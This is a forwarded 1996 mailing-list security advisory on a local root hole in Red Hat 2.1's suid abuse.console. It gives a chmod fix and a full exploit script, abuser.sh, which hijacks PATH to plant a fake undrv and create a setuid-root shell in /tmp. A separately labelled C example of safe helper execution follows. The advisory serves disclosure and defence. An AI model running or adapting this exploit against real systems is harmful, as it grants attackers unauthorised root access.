BoS: abuse Red Hat 2.1 security hole (Just got it :))
>---------- Forwarded message ----------
>Date: Fri, 2 Feb 1996 22:28:30 -0500 (EST)
>From: David J Meltzer <davem+@andrew.cmu.edu>
>To: best-of-security@suburbia.net, bugtraq@crimelab.com,
> linux-security@tarsier.cv.nrao.edu, linux-alert@tarsier.cv.nrao.edu
>Subject: BoS: abuse Red Hat 2.1 security hole
>
> There is a security hole in Red Hat 2.1, which installs the game abuse,
>/usr/lib/games/abuse/abuse.console suid root. The abuse.console program
>loads its files without absolute pathnames, assuming the user is running
>abuse from the /usr/lib/games/abuse directory. One of these files is the
>undrv program, which abuse executes as root. If the user is not in the
>abuse directory when running this, an arbitrary program can be substituted
>for undrv, allowing the user to execute arbitrary commands as root.
> If abuse.console needs to be run by users other than root at the console,
>provisions need to be made in the code to not execute or load any files
>as root.
>
> Program: /usr/lib/games/abuse/abuse.console suid root
>Affected Operating Systems: Red Hat 2.1 linux distribution
> Requirements: account on system
> Patch: chmod -s /usr/lib/games/abuse/abuse.console
> Security Compromise: root
> Author: Dave M. (davem@cmu.edu)
> Synopsis: abuse.console runs undrv without an absolute
> pathname while executing as root, allowing
> a user to substitute the real undrv with
> an arbitrary program.
>
>Exploit:
>#!/bin/sh
>#
># abuser.sh
># exploits a security hole in abuse to create
># a suid root shell /tmp/abuser on a linux
># Red Hat 2.1 system with the games package
># installed.
>#
># by Dave M. (davem@cmu.edu)
>#
>echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
>echo ================ Checking system vulnerability
>if test -u /usr/lib/games/abuse/abuse.console
>then
>echo ++++++++++++++++ System appears vulnerable.
>cd /tmp
>cat << _EOF_ > /tmp/undrv
>#!/bin/sh
>/bin/cp /bin/sh /tmp/abuser
>/bin/chmod 4777 /tmp/abuser
>_EOF_
>chmod +x /tmp/undrv
>PATH=/tmp
>echo ================ Executing Abuse
>/usr/lib/games/abuse/abuse.console
>/bin/rm /tmp/undrv
>if test -u /tmp/abuser
>then
>echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
>else
>echo ---------------- Exploit failed
>fi
>else
>echo ---------------- This machine does not appear to be vulnerable.
>fi
>
>
> /-------------\
> |David Meltzer|
> |davem@cmu.edu|
> /--------------------------\
> |School of Computer Science|
> |Carnegie Mellon University|
> \--------------------------/
>
Ron Cohen, Tel-Aviv University Computation Center
Office 03-6407043, Home 09-663590
E-mail: rony@post.tau.ac.il
Fax: (972) 03-6409118
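
The code-level fix the advisory asks for, as an added example (not part of the original post and not code from abuse): a setuid program that must run a helper refuses any name that is not an absolute path, checks that the file is root-owned and not group- or world-writable, and drops privileges before executing it with a fixed environment. The names `helper_path_ok` and `run_helper` are hypothetical, and the helper location `/usr/lib/games/abuse/undrv` is assumed from the advisory's description.

```c
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return 1 only if `path` is safe to execute from a privileged program. */
int helper_path_ok(const char *path)
{
    struct stat st;

    if (path == NULL || path[0] != '/')        /* no PATH or cwd lookup */
        return 0;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    if (st.st_uid != 0)                        /* must be owned by root */
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))      /* nobody else may rewrite it */
        return 0;
    return 1;  /* parent directories are not checked in this sketch */
}

/* Run the helper as the invoking user; return its exit status or -1. */
int run_helper(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL };  /* fixed environment */
    int status;
    pid_t pid;

    if (!helper_path_ok(path))
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        /* Drop group, then user, privileges permanently before exec. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        if (getuid() != 0 && setuid(0) == 0)   /* root must not be regainable */
            _exit(126);
        execve(path, argv, envp);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Helper path assumed from the advisory's description of the install directory. */
int main(void) { return run_helper("/usr/lib/games/abuse/undrv") == 0 ? 0 : 1; }
```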